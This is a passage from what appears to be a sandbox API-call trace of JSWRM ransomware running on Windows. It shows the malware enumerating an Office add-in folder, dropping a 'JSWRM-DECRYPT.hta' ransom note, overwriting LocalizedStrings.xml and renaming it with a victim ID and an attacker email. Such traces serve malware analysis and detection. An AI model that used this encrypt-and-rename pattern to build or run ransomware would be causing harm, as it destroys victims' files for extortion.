lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0126.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0126.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0126.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.555] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x97efe5f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x97efe5f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x981606a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0126.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0126.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0126.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0126.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.555] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x97efe5f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x97efe5f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x981606a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.555] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0126.555] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf458770a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0126.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0126.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0126.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0126.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0126.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0126.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fr\\jswrm-decrypt.hta")) returned 0xffffffff [0126.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0126.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0126.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0126.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0126.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0126.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0126.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0126.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0126.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.558] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.558] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.559] CloseHandle (hObject=0x314) returned 1 [0126.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0126.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0126.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0126.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0126.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0126.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0126.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0126.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0126.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0126.559] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fr\\jswrm-decrypt.hta")) returned 0x20 [0126.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0126.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0126.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0126.559] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fr\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf458770a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4217b3c3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0126.559] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf458770a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4217b3c3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0126.560] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4217b3c3, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4217b3c3, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4217b3c3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0126.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0126.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0126.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0126.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0126.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0126.560] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16783027, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10fa, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0126.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x2412b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0126.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241268, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0126.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0126.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fr\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fr\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.561] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4346) returned 1 [0126.561] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10f0) returned 0x278330 [0126.561] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x10f0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x10f0, lpOverlapped=0x0) returned 1 [0126.563] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.563] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x10f0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x10f0, lpOverlapped=0x0) returned 1 [0126.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.563] CloseHandle (hObject=0x338) returned 1 [0126.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0126.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0126.564] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fr\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fr\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fr\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fr\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3f92917, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3f92917, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3fb8b54, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xca90, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc34bb5b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc34bb5b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc34bb5b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x38ad0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7beb2bc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7beb2bc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13a90, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6cdf4b7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6cdf4b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6cdf4b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x202030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3038, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5f9c329, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f9c329, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MI93CC~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf458770a, 